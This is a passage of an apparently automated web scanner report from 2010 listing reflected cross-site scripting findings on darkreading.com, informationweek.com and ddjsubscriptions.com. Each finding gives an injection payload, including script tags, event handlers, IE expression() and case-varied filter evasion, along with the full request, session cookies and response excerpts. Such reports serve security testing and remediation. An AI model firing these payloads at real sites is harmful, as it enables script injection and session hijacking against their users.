The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dd2c"><script>alert(1)</script>11e3c82816a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/security-management?5dd2c"><script>alert(1)</script>11e3c82816a=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Security ...[SNIP]... g.com%2Fsecurity%2Fsecurity-management%3F5dd2c%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E11e3c82816a%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/security-management?5dd2c"><script>alert(1)</script>11e3c82816a=1"> ...[SNIP]...
3.610. http://www.darkreading.com/security/storage-security [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/storage-security
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1204e"><script>alert(1)</script>65e9c3df79c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/storage-security?1204e"><script>alert(1)</script>65e9c3df79c=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Storage S ...[SNIP]... reading.com%2Fsecurity%2Fstorage-security%3F1204e%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E65e9c3df79c%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/storage-security?1204e"><script>alert(1)</script>65e9c3df79c=1"> ...[SNIP]...
3.611. http://www.darkreading.com/security/vulnerabilities [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/vulnerabilities
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bc46"><script>alert(1)</script>c30f82e43ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/vulnerabilities?1bc46"><script>alert(1)</script>c30f82e43ce=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the K request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae345"%3balert(1)//9b10183d617 was submitted in the K parameter. This input was echoed as ae345";alert(1)//9b10183d617 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ars/ddjintlforward.do?mode=pageforward&forward=ddjintlpage1&F=1021&K=WYH1ae345"%3balert(1)//9b10183d617 HTTP/1.1 Host: www.ddjsubscriptions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 01:08:16 GMT Set-Cookie: JSESSIONID=D695E11B7C4B9ED1C2314EBF0D2BEF45.tomcat1; Path=/ars Content-Type: text/html;charset=UTF-8 Connection: close Set-Cookie: UBM-ARS=238132160.20480.0000; expires=Sun, 12-Dec-2010 02:13:49 GMT; path=/ Content-Length: 52776
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4468e"style%3d"x%3aexpression(alert(1))"af8f2667205 was submitted in the REST URL parameter 1. This input was echoed as 4468e"style="x:expression(alert(1))"af8f2667205 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /GLOBAL4468e"style%3d"x%3aexpression(alert(1))"af8f2667205/btg/iwbtn/user/register.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:01 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:01 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30307
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/GLOBAL4468e"style="x:expression(alert(1))"af8f2667205/btg/;kvarticleid=;kvauthor=;loc=300;grp=226145798" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 818c2"><ScRiPt>alert(1)</ScRiPt>a9753c26fcd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /GLOBAL/818c2"><ScRiPt>alert(1)</ScRiPt>a9753c26fcd/iwbtn/user/register.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:07 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:07 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30250
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/GLOBAL/818c2"><ScRiPt>alert(1)</ScRiPt>a9753c26fcd/iwbtn/u;kvarticleid=;kvauthor=;loc=300;grp=376397906" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7dd37</script>1c79a8dcf28 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /GLOBAL/7dd37</script>1c79a8dcf28/iwbtn/user/register.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:10 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:10 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30126
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/GLOBAL/7dd37</script>1c79a8dcf28/iwbtn/user/register;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=682658030;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93c94</script><a>75eb4bf9d34 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /GLOBAL/btg/iwbtn/user/register.jhtml93c94</script><a>75eb4bf9d34 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:23 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:23 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30218
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/GLOBAL/btg/iwbtn/user/register93c94</script><a>75eb4bf9d34;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=868362529;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43daf"a%3d"b"26635190e1 was submitted in the REST URL parameter 5. This input was echoed as 43daf"a="b"26635190e1 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /GLOBAL/btg/iwbtn/user/register.jhtml43daf"a%3d"b"26635190e1 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:18 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:18 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30120
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/GLOBAL/btg/iwbtn/user/register43daf"a="b"26635190e1;kvarticleid=;kvauthor=;loc=300;grp=777728616" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2eabc"><img%20src%3da%20onerror%3dalert(1)>44096f13246 was submitted in the REST URL parameter 1. This input was echoed as 2eabc"><img src=a onerror=alert(1)>44096f13246 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /2eabc"><img%20src%3da%20onerror%3dalert(1)>44096f13246/main/archives/david_berlinds_tech_radar/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:41 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:41 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 31431
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main//2eabc"><img src=a onerror=alert(1)>44096f13246/;kvarticleid=;kvauthor=;loc=300;grp=636009824" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a7be</ScRiPt%20><a%20b%3dc>20e1010380b was submitted in the REST URL parameter 1. This input was echoed as 3a7be</ScRiPt ><a b=c>20e1010380b in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /3a7be</ScRiPt%20><a%20b%3dc>20e1010380b/main/archives/david_berlinds_tech_radar/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:48 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:48 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 31361
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main//3a7be</ScRiPt ><a b=c>20e1010380b/main/archives;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=641403971;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73b34"%20a%3db%20eae4008d423 was submitted in the REST URL parameter 4. This input was echoed as 73b34" a=b eae4008d423 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/main/archives/david_berlinds_tech_radar73b34"%20a%3db%20eae4008d423/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:04 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:04 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 59324
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/david_berlinds_tech_radar73b34" a=b eae4008d423/in;kvarticleid=;kvauthor=;loc=300;grp=673960522" target="_blank"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27123</script>d37dc33f31f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/main/archives/david_berlinds_tech_radar27123</script>d37dc33f31f/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:10 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:10 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 59330
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/david_berlinds_tech_radar27123</script>d37dc33f31f;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=332843015;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74918'-alert(1)-'b427949f276 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog74918'-alert(1)-'b427949f276/main/archives/digital_life/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:39 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:39 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 31327
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main//blog74918'-alert(1)-'b427949f276/main/archives/;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=79470540;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f61c8"style%3d"x%3aexpression(alert(1))"cc3df39b6a2 was submitted in the REST URL parameter 1. This input was echoed as f61c8"style="x:expression(alert(1))"cc3df39b6a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /blogf61c8"style%3d"x%3aexpression(alert(1))"cc3df39b6a2/main/archives/digital_life/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:37 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:37 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 31416
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <IMG height=1 width=1 SRC="http://view.atdmt.com/action/MSFT_TechWeb_AE_ExtData/v3/atc1.informationweek/atc2.blogf61c8"style="x:expression(alert(1))"cc3df39b6a2/atc3./"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1df9"%20style%3dx%3aexpression(alert(1))%20c7235a52672 was submitted in the REST URL parameter 2. This input was echoed as b1df9" style=x:expression(alert(1)) c7235a52672 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /blog/b1df9"%20style%3dx%3aexpression(alert(1))%20c7235a52672/archives/digital_life/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
